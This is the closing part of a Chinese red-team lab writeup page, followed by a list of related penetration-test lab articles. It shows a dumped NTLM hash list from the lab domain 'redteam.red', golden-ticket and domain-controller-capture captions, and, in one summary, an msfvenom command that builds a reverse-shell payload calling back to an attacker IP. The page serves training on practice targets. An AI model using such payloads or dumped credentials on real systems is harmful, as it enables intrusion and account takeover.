redteam.red\SM_dfb6b69905864ca19:1121:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                                    
redteam.red\SM_958e768f5a2e4c9fb:1122:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                                    
redteam.red\SM_645db7f160894c7fb:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                                    
redteam.red\mail:1125:aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c:::                                                                                                    
redteam.red\sqlserver:1126:aad3b435b51404eeaad3b435b51404ee:6a59bf65a4957ac67e5fb4e1c221939c:::                                                                                               
redteam.red\saulgoodman:1128:aad3b435b51404eeaad3b435b51404ee:c0e1f147edf7462134f07e389c5466e2:::                                                                                             
redteam.red\gu:1129:aad3b435b51404eeaad3b435b51404ee:82a28aff9a3be5385b87c4928b54a66f:::                                                                                                      
redteam.red\apt404:1130:aad3b435b51404eeaad3b435b51404ee:ba0b26eb2595bc0a639d986537433e5d:::                                                                                                  
redteam.red\adduser:1131:aad3b435b51404eeaad3b435b51404ee:168df3659b5f75ab35645606839e5677:::                                                                                                 
redteam.red\saul:1135:aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c:::
OWA$:1000:aad3b435b51404eeaad3b435b51404ee:8623dc75ede3ca9ec11f2475b12ef96d:::     
SQLSERVER-2008$:1127:aad3b435b51404eeaad3b435b51404ee:2dae08cafb67b4537b7d5871084c961d:::   
WORK-7$:1138:aad3b435b51404eeaad3b435b51404ee:f085f13639b3de3c78de926c0719d36d:::
Golden ticket
0da914744aa879824a31f606f9bfb850.png
pic147-黄金票据
Finally
c33a612bb46104a8c9cf194e72ac9816.png
pic148-GOT DC


来和20000+位同学加入MS08067一起学习吧!

5dfa16acf4584a6e3893d4631dfca440.gif

Ms08067安全实验室
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
实战ATT&CK攻击链路--靶场Writeup(二)
Ms08067安全实验室
11-01 423
文章来源|MS08067 安全练兵场 知识星球本文作者:godunt(安全练兵场星球合伙人)玩靶场 认准安全练兵场成立"安全练兵场"的目的目前,安全行业热度逐年增加,很多新手安全从业人员在...
Vulnstack红日安全内网渗透靶场1实战_vulnstack靶场
2401_84297455的博客
04-28 998
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场渗透过程。在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。
Vulnstack红日安全内网渗透靶场1实战
热门推荐
道阻且长,行则将至。
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
Vulntarget-b靶场渗透WP
最新发布
Fear1e4的博客
06-13 442
nmap端口探测网页访问端口目录扫描网页直接登陆报错404。访问admin.php,有后台管理系统登陆页。bp弱口令爆破admin123,版本1.8.1,查漏洞。
渗透靶场实战
蚁景网安学院
12-06 1196
前言最近,要做一个技术沙龙,本来想分享一下安全研究的一些心得,但是好久之前想做一个渗透的一个深入总结,但是一直搁置,借这个机会对渗透的技巧总结一下!算是给自己一个交代:)正文这里用的...
VulnStack环境靶场渗透(一)
qq_43590351的博客
09-20 1424
红日靶场一 msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.31.229 LPORT=4444 -f exe -o msf1.exe 实验环境 web服务器 192.168.31.79192.168.52.143 成员server2003 192.168.52.141 控server2008 192.168.52.138 物理机 192.168.31.238 kali-vps 192.168.31.229
三层网络渗透靶场打靶
qq_64036695的博客
04-15 53
整个靶场网络环境分为三层。从最初的信息收集、外网初探、攻入内网、搭建代理,横向移动,最终拿下控。端口扫描端口服务识别漏洞搜索与利用Laravel Debug mode RCE(CVE-2021-3129)漏洞利用Docker逃逸通达OA v11.3 漏洞利用Linux环境变量提权Redis 未授权访问漏洞Linux sudo权限提升(CVE-2021-3156)漏洞利用SSH密钥利用Windows NetLogon 内权限提升(CVE-2020-1472)漏洞利用。
2024年最新Vulnstack红日安全内网渗透靶场1实战_vulnstack靶场(1)
2401_84297265的博客
05-03 1608
内网靶场渗透实验,大概得折腾了我整整 3-4 天才做完(而且各种攻击不畅……),其中 Win7 跳板机执行命令频繁报错如下(各种百度解决方案均行不通,如有知情大佬请赐教,感激不尽……
2024年网安最全Vulnstack红日安全内网渗透靶场1实战_vulnstack靶场
2401_84252281的博客
05-03 1620
是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场渗透过程。
Vulnstack红日安全内网渗透靶场1实战_vulnstack靶场(1)
2401_84297455的博客
04-28 876
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场渗透过程。
完整的内网渗透-暗月培训之项目六1
08-03
1. 环境介绍3 2. 信息收集3 3. 对网站进行安全检测4 5. 跨网段渗透15
渗透练习-XVWA渗透测试靶场
01-26
Xtreme Vulnerable Web Application (XVWA)是一款使用PHP/MySQL编写的靶场,可以帮助初学者快速学习安全姿势巩固渗透测试知识。建议将这个靶场部署在本地服务器来提升你的能力。 指令:XVWA采用一站式安装,你可以在windows, linux 或 Mac平台下进行设置,为了能正常使用XVMA你需要按以下几个步骤配置Apache-PHP-MYSQL环境,这里我们使用的是XAMP,你也可以自己选择喜欢的集成包。 将xvwa文件复制到你的web目录,确保目录名依旧为xvwa。 配合kali效果更佳
渗透攻击红队渗透靶场
qq_31812157的博客
03-11 463
由于连接上之后总是掉权限,并且计划任务不知道为什么报错,mimikatz总是需要频繁的重新导入票据,捣鼓了很久没有思路,在翻笔记时想起了,建立ipc之后 psexec 就不需要账号密码了,于是下面的命令成功执行了shell。发现还是普通权限,不过没关系我们可以上传一个cs中转的木马,使用SharpSQLTools的system权限来执行。发现sqlserver的用户设置了约束委派,因此我们要拿下sqlserver那台主机,使用约束委派拿下控。经历千辛万苦,终于成功了,他攻击的时候不要按回车,可能出问题。
内网渗透总结(红日靶场一)
未完成的歌~的博客
04-11 6248
使用 smb beacon,由一台已经拿到 beacon 的机器,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。发现也存在漏洞,同样先使用 use exploit/windows/smb/ms17_010_eternalblue 模块利用,但还是利用不了,猜测可能是防火墙的问题,因为这个系统是64位的。防火墙已经关掉了,再来试试 ms17_010_eternalblue,然而还是不行。
DMZ靶场渗透
dda6607的博客
06-19 483
0x00 目标站点www.test.ichunqiu 0x01 尝试登陆系统 -尝试弱密码登陆 结果:forbidden!!! -尝试万能账号密码登陆 1‘ or 1=1--+ 和 1‘ or 1=1--+ 结果:forbidden!!! 从登陆入口得不到其他更多的有效信息,所以从其他地方找突破口 0x02 使用御剑后台扫描工具对站点进行扫面 -开...
红队靶场内网渗透(从DMZ主机渗透内机器)
m0_65712192的博客
02-12 3929
红队靶场内网渗透(从DMZ主机渗透内机器)
记一次自建靶场渗透过程
Boom!脑洞大爆炸的博客
07-04 889
记一次自建靶场渗透过程
2024年CentOS RHEL 系统更新安全补丁的方法_怎样升级red hat 补丁(2),网络安全音频面试
2401_84264244的博客
05-05 371
默认情况下, cron 任务被配置成了立即下载并安装所有更新,但是我们可以通过在 /etc/sysconfig/yum-cron 配置文件中把下面两个参数改为yes,从而改变这种行为。为了使来自 root@localhost 的通知能够通过邮件发送给同一账户(再次说明,你可以选择其他账户,如果你想这样的话),下面这些行也是必须的。安装完成以后,打开/etc/yum/yum-cron.conf,然后找到下面这些行内容,你必须确保它们的值和下面展示的一样。而其它的行保证了能够通知并自动下载、安装安全升级。
内网渗透思路整理与工具使用
Fly_鹏程万里
06-09 3345
在企业安全对抗中,红方攻击团队经常会遇到这种情况,在企业的网络边界上获取到部分权限,比如一个web服务器的webshell,然而如何更方便的进行下一步的渗透呢?如何对内网进行渗透测试,这时就需要隧道转发技术,穿透边界防火墙、安全代理等安全设备,进行深层次的安全测试。本文的主要内容是穿透内网的各种姿势。典型的边界网络架构图利用ssh建立隧道动态端口转发原理:建立一个动态的SOCKS4/5的代理通道,...
内网控信息需要收集哪些
03-31
1.名(Domain Name) 2.控制器IP地址(Domain Controller IP Address) ... 4.控制器操作系统信息(Domain Controller Operating System Information) ... ...7.策略信息(Domain Policy Information) ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值